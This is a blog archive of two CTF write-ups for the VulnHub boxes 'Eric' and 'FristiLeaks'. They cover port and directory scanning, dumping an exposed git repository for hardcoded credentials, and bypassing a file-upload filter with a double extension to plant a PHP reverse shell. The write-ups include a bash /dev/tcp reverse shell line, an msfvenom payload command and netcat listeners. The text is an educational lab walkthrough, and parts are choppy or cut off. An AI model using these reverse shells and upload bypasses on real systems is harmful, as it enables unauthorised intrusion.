Project Moonrope_

Category Archives: CTF Write Ups

Here i will be posting Write ups for CTFs

Eric Write Up

Posted on by

Initial recon

i ran an nmap scan with save scripts and save the results to a file
“nmap -Sc -Sv 192.168.56.101 -oA Eric”

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d3:79:15:3d:11:4c:af:26:6c:b2:af:6a:0b:99:14:fd (RSA)
| 256 87:48:76:38:81:c2:a0:50:cd:4c:39:c0:7c:7a:07:40 (ECDSA)
|_ 256 8e:b9:dd:8d:14:9b:e3:63:1d:d7:0e:54:98:8d:29:5b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-git:
| 192.168.56.101:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the…
|_ Last commit message: minor changes
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Blog under construction
MAC Address: 08:00:27:3C:5F:C1 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

the open ports are 22 which is ssh and port 80 which is a web server.

Webserver Enumeration

runing dirb on the webserver to see if there are any interesting directories

START_TIME: Tue Oct 22 15:54:14 2019
URL_BASE: http://192.168.56.101/

WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

GENERATED WORDS: 4612
—- Scanning URL: http://192.168.56.101/ —-

  • http://192.168.56.101/.git/HEAD (CODE:200|SIZE:23)
  • http://192.168.56.101/admin.php (CODE:200|SIZE:306)
  • http://192.168.56.101/index.php (CODE:200|SIZE:281)
  • http://192.168.56.101/server-status (CODE:403|SIZE:302)
    ==> DIRECTORY: http://192.168.56.101/upload/

—- Entering directory: http://192.168.56.101/upload/ —-

END_TIME: Tue Oct 22 15:54:22 2019
DOWNLOADED: 9224 – FOUND: 4

There us an admin page here.
tried the creds admin:admin admin:password1. with no luck

Exploring the Git Repo

on the webserver there is also a git repo. there might be some config files with passwords so this might be worth a look.

by using GitTools we are able to pull down the repository

root@kali:~/GitTools/Dumper# ./gitdumper.sh http://192.168.56.101/.git/
~/Documents/VulnHub/Eric/

GitDumper is part of https://github.com/internetwache/GitTools

[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stashs
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[+] Downloaded: objects/3d/b5628b550f5c9c9f6f663cd158374035a6eaa0
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/cc/1ab96950f56d1fff0d1f006821cab6b6b0e249
[+] Downloaded: objects/a8/9a716b3c21d8f9fee38a0693afb22c75f1d31c
[+] Downloaded: objects/31/33d44be3eebe6c6761b50c6fdf5b7fb664c2d8
[+] Downloaded: objects/3d/8e9ce9093fc391845dd69b0436b258ac4a6387
[+] Downloaded: objects/f0/d95f54335626ce6c96522e0a9105780b3366c5
[+] Downloaded: objects/c0/951efcb330fc310911d714acf03b873aa9ab43
[+] Downloaded: objects/23/448969d5b347f8e91f8017b4d8ef6edf6161d8
[+] Downloaded: objects/e7/ba67226cda1ecc1bd3a2537f0be94343d448bb

Using the extractor which is also part of GitTools we can pull out the files from the downloaded dump

./extractor.sh ~/Documents/VulnHub/Eric/ ~/Documents/VulnHub/Eric/

[+] Found commit: 3db5628b550f5c9c9f6f663cd158374035a6eaa0
[+] Found file: /root/Documents/VulnHub/Eric//0-3db5628b550f5c9c9f6f663
cd158374035a6eaa0/admin.php
[+] Found file: /root/Documents/VulnHub/Eric//0-3db5628b550f5c9c9f6f663cd158374035a6eaa0/index.php
[+] Found commit: a89a716b3c21d8f9fee38a0693afb22c75f1d31c
[+] Found file: /root/Documents/VulnHub/Eric//1-a89a716b3c21d8f9fee38a0693afb22c75f1d31c/admin.php
[+] Found file: /root/Documents/VulnHub/Eric//1-a89a716b3c21d8f9fee38a0693afb22c75f1d31c/index.php
[+] Found commit: cc1ab96950f56d1fff0d1f006821cab6b6b0e249
[+] Found file: /root/Documents/VulnHub/Eric//2-cc1ab96950f56d1fff0d1f006821cab6b6b0e249/index.ph

lets check the admin php files for any hard coded credentials

in the file /root/Documents/VulnHub/Eric//0-3db5628b550f5c9c9f6f663cd158374035a6eaa0/index.php we have the following code :

if ($_POST['submit']) {
if ($_POST['username'] == 'admin' && $_POST['password'] == 'st@mpch0rdt.ightiRu$glo0mappL3') {
$_SESSION['auth'] = 1;
} else {
exit("Wrong username and/or password. Don't even bother bruteforcing.");
}
}

this has a username and password stored in there
admin:st@mpch0rdt.ightiRu$glo0mappL3

this user name has allowed us to log in and we are greeted with a file upload page to

we can use this to upload a reverse php and then set a listener on our loacal machine using nc -lvp 4444 .

to exectue the reversell we need to navigate to the php file which will be in the uploads directory 192.168.56.101/uploads/rev.php

then using simplehttpserver and wget to grap the /linenum.sh file from the local machine,

msfvenom -p cmd/unix/reverse_bash LHOST=192.168.56.101 LPORT=5544 raw > backup.sh

user Flag
89340a83****


echo “0<&83-;exec 83<>/dev/tcp/192.168.56.101/5544;sh <&83 >&83 2>&83" > backup.sh

o “cat /root/flag.txt > /tmp/root.txt”

root Flag
6a347b9****

Fristileaks Write-up

Posted on by

This write up is for the FristiLeaks Box from VulnHub

this was the box chosen for the MGH CTF

Step 1. Enumeration (Initial information gathering)

first thing we need to do is find out more about the box one of the ways to do this is using a port scanner to check what ports are open this might tell us more about what it is we are dealing with.

when the box is booted in in virtual box the ip address of the target is displayed on the “screen” along with some instructions

First of all we can start off with a port scan to try and get some information about the Box that we are looking at.

This information will be important in deciding on how we might be able to get onto the box , There are a few common ports that we can look at (21:FTP 22:SSH 23:Telnet 25:SMTP 80:HTTP) to give us a starting point.

on the default kali install there is a port scanner called nmap to run this you just need to open up the terminal and type nmap and the target ip

nmap 192.168.56.101

This scan gives us the following results:

Basic nmap scan results

from this we can see that port 80 is open and as we discussed earlier this the HTTP port which would indicate that there is most likely a web server running.

so lets get some more information on this by running nmap with flags -sC and -sV this will run the ‘Script Scan'(-sC) and check versions (-sV) of the services are running this is useful for identifying if there are any services that are older and maybe not patched for known vulnerabilities. we can also output the results to a file buy running the -oN flag and a file name.

nmap -sC -sV 192.168.56.101 -oN Fristi

which gives us the following information.

looks like there are some pages in the robots.txt file these might be worth a look later on once we have poked around the initial page .

Step 2. Visiting the site

after putting the ip of the machine into the url field on the browser we are greeted with this page:

http://192.168.56.101

not a lot of information on the page except that ‘Frisi’ is a drink . so lets have a look at the page source

not a great deal here either but in the nmap scan results the robots.txt listed the following directories /cola /sisi /beer . so if we append the directory name to the end of the ip we might get some more information

Each one of the drink related directories gives us this page and nothing in the source . but we know from the inital page that fristi is a drink too so lets give that a shot.

great stuff we have a login page but no creds . so lets have a look at the source to see if there is any interesting information in there.

in the <head> tags of the page there are two things like they might be useful a desctipion :

`<content="super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.">`

and a html comment that is signed off by a potential user ‘eezeepz’

<!-- TODO: We need to clean this up for production. I left some junk in here to make testing easier. - by eezeepz -->

the next thing on the source is a massive string of text but based on the information how the <img src=”data:img/png;base64… tag starts it looks to be a base64 encoded image . so we can scroll past this underneath this is another html comment with what looks to be a base64 encoded string . so lest copy this into a file and convert it .

nano b64text

and then paste the string in and Ctrl + x to save the file. once we have done this we need to decode the string you can do this by issuing the following command in the terminal

cat b64text | base64 -d > outputfile

once we have the output file we can find out what the actual file type is by running the file command against the ‘outputfile’ like this:

using the mv command we can add .png extension to the output file and the open the file in the file browser mv outputfile outputfile.png

once we open the file we are met with a string of text that could be a possible password as the comments earlier suggest that base64 encoding things is: ‘super leet password login-test page. We use base64 encoding’

Stage 3. Logging in and getting an inital foothold

now that we have some possible credentials its time to give them a try .


Sucess this login info worked and with a simple file upload page

based on the text on the button this will filter anything that isn’t an image

attempting to upload a php reverse shell from http://pentestmonkey.net/tools/php-reverse-shell configured with the local IP of the attacking machine and the port that the response will come through on

Once the php is configured the the listener needs to be set up to listen on the same port using the following command

nc -lvp 9001

this will catch the shell once the php is run

upon trying to upload a reverse shell php file from called s.php the site responds with the following error message:



It might be possible to get around this with a “Double Extention” so if file name of the shell is changed to s.php.png the file might upload depending on how the uploader is checking the file type.

upload sucsessful

lets navigate to the ../uploads/s.php.png to activate the reverse shell
and then check the listener to see if the php executed and started the reverse shell

shell is running as the apache users

now that an initial foothold has been established its time to look for a way to get some kind of persistence just in case the session gets disconnected.

it is possible to upload any file type now using the python module ‘SimpleHTTPServer’ and wget to pull the file onto the target.

by navigating to the webserver directory on the target machine(/var/www/html/fristi/uploads) and the on the attacking machine navigate to the directory that the files stored in then run the command to start the webserverpython -m SimpleHTTPServer 8081
and then on the target machine run the wget command to download the file

so navigating to the ../uploads/full_shell.php will run the full shell php (which has tab complete)

Step 4 Local enumeration

so now that the initial foothold has been established its time to see what is accessible . firstly find out what user the shell is running as by typing whoami this returns the username Apache which makes sense as that’s most likely the user that runs the web server.

after checking the /var/www directory seeing what other sites are hosted on the system there is a notes.txt file in the directory the file contains the following text. hey eezeepz your homedir is a mess, go clean it up, just dont delete the important stuff. -jerry

eezeepz was the user that was used to log into the uploads section . checking what information is in the /home/eezeepz/

there is also a notes.txt in the home folder that contains the following information.

`Yo EZ, I made it possible for you to do some automated checks, but I did only allow you access to /usr/bin/* system binaries. I did however copy a few extra often needed commands to my homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those from /home/admin/ Don't forget to specify the full path for each binary! Just put a file called "runthis" in /tmp/, each line one command. The output goes to the file "cronresult" in /tmp/. It should run every minute with my account privileges. - Jerry

this means what ever comand is in the runthis file it will